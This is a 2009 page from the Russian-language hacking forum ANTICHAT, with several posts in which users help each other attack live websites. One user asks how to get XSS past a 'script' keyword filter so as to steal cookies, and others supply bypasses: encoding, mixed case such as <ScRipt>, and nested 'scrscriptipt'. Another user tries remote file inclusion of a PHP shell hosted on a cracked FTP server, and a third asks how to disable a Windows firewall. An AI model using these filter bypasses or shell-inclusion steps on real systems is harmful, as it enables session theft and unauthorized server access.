HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5351  
Старый 07.02.2009, 17:30
holden321
Новичок
Регистрация: 31.10.2008
Сообщений: 15
Провел на форуме:
48847

Репутация: 1
По умолчанию

подскажите, можно как-нибудь провети XSS если нельзя использовать слова "script" и "javastript"?
(интересует отправка куков)
 
Ответить с цитированием

  #5352  
Старый 07.02.2009, 17:52
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию

Цитата:
Сообщение от holden321  
подскажите, можно как-нибудь провети XSS если нельзя использовать слова "script" и "javastript"?
(интересует отправка куков)
можно попытыаться обойти фильтр зашифруй например s и j http://h4k.in/encoding/index.php
 
Ответить с цитированием

  #5353  
Старый 07.02.2009, 18:24
holden321
Новичок
Регистрация: 31.10.2008
Сообщений: 15
Провел на форуме:
48847

Репутация: 1
По умолчанию

в смысле вот так?
<%73cript>alert("hello");</%73cript>
почемуто не работает(
просто как текст выводиться, броузер не воспринимает это как тэги
 
Ответить с цитированием

  #5354  
Старый 07.02.2009, 18:28
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию

Цитата:
Сообщение от holden321  
в смысле вот так?
<%73cript>alert("hello");</%73cript>
почемуто не работает(
просто как текст выводиться, броузер не воспринимает это как тэги
encode decimal entities в линк на кодировщик выше
так же там есть варианты обхода. пробуй.
 
Ответить с цитированием

  #5355  
Старый 07.02.2009, 18:35
desTiny
Reservists Of Antichat - Level 6
Регистрация: 04.02.2007
Сообщений: 1,152
Провел на форуме:
3008839

Репутация: 1502


По умолчанию

так-с.. иногда прокатывает изменение регистра, типа <ScRipt> и JavaScript, а иногда, если, к примеру, вырезается слово "script" можно отправить "scrscriptipt", и после удаления слова "script" останется "script".

Наверно, как-нибудь ещё можно
__________________
Bedankt euch dafür bei euch selbst.

H_2(S^3/((z1, z2)~(exp(2pi*i/p)z1, exp(2pi*q*i/p)z2)))=Z/pZ
 
Ответить с цитированием

  #5356  
Старый 07.02.2009, 18:38
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию

Если это паблик двиг,да и даже если не паблик,(те можно скачать), самое верное это посмотреть код, который отвечает за фильтрацию.
 
Ответить с цитированием

  #5357  
Старый 07.02.2009, 18:57
holden321
Новичок
Регистрация: 31.10.2008
Сообщений: 15
Провел на форуме:
48847

Репутация: 1
По умолчанию

мухаха, изменение регистра помогло
двиг там походу самопальный, и он не вырезает, а заменяет на **caractères interdits**, это по-французски
 
Ответить с цитированием

  #5358  
Старый 07.02.2009, 20:40
$p01nt
Участник форума
Регистрация: 19.02.2008
Сообщений: 186
Провел на форуме:
584540

Репутация: 96
По умолчанию

Помогите разобраться с пхп инъекциями плз
Нашел сайт, когда подставляю после index.php?cel= свой урл, открывается сайт с иньекцией и там во фрейме url который я указал.
Решил залить шел, залил шел на ломаную фтпшку и подставил этот url:
index.php?cel=http://site.com/shell.txt
Мне выдало текстовик. Попробовал так
index.php?cel=http://site.com/shell
Так же выдало текстовик
Попробовал так
index.php?cel=http://site.com/shell.php
Вылазит шел доступ для сайта на котором залит шел
Подскажите пожалуйста решение)
 
Ответить с цитированием

  #5359  
Старый 07.02.2009, 20:43
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489

Репутация: 1359


По умолчанию

Цитата:
Сообщение от $p01nt  
Помогите разобраться с пхп инъекциями плз
Нашел сайт, когда подставляю после index.php?cel= свой урл, открывается сайт с иньекцией и там во фрейме url который я указал.
Решил залить шел, залил шел на ломаную фтпшку и подставил этот url:
index.php?cel=http://site.com/shell.txt
Мне выдало текстовик. Попробовал так
index.php?cel=http://site.com/shell
Так же выдало текстовик
Попробовал так
index.php?cel=http://site.com/shell.php
Вылазит шел доступ для сайта на котором залит шел
Подскажите пожалуйста решение)
скорее всего это просто iframe. никакой инъекции тут нет.
 
Ответить с цитированием

  #5360  
Старый 07.02.2009, 22:50
SHS
Познающий
Регистрация: 04.08.2008
Сообщений: 53
Провел на форуме:
63941

Репутация: 2
По умолчанию

Народ, подскажите пожалуйста как отрубить microsoft firewall?
- после выполнения комманды net stop - винда уходит в ребут. При выполнении sc config просит пароль. Может есть кака-либо народная хитрость? )))
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ